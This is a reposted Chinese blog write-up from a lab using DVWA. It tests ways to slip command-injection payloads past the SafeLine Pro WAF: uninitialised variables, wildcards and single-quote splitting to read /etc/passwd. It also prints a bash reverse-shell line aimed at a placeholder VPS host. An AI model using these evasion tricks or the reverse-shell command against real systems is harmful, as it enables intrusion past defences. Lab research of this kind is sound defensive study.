BypassWAF研究系列-雷池_rce绕过

admin 2024年12月3日13:43:53评论64 views字数 379阅读1分15秒阅读模式

0x00 环境配置

dvwa+雷池pro高强度防护

BypassWAF研究系列-雷池_rce绕过

BypassWAF研究系列-雷池_rce绕过

0x01 尝试绕过

一、先打一个cat /etc/passwd测试防护防护生效。

BypassWAF研究系列-雷池_rce绕过

BypassWAF研究系列-雷池_rce绕过

二、使用未初始化变量绕过

在linux中,没有初始化的变量视为空。如cat /etc$u/passwd$u

BypassWAF研究系列-雷池_rce绕过

测试一下,成功拦截。

BypassWAF研究系列-雷池_rce绕过

或许是因为检测到了cat?  把cat改为ct

BypassWAF研究系列-雷池_rce绕过

二、使用通配符绕过

通配符代表任意字符

BypassWAF研究系列-雷池_rce绕过

/etc/passwd通过防护,但还需要解决cat拦截。

BypassWAF研究系列-雷池_rce绕过

三、使用单引号绕过

单引号用于保护特殊符号,如单引号内的空格、$、* 等特殊字符会被原样输出,不会被解释。

BypassWAF研究系列-雷池_rce绕过

0x02 尝试反弹shell

使用通配符,反弹失败。

127.0.0.1 |/b?n/b??h -i >& /dev/tcp/vps ip/1234 0>&1

BypassWAF研究系列-雷池_rce绕过

BypassWAF研究系列-雷池_rce绕过

0x03 总结

rce很好绕,但是xss很难绕。

BypassWAF研究系列-雷池_rce绕过

原文始发于微信公众号(rainy的安全小屋):BypassWAF研究系列-雷池_rce绕过

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年12月3日13:43:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BypassWAF研究系列-雷池_rce绕过https://cn-sec.com/archives/3449964.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息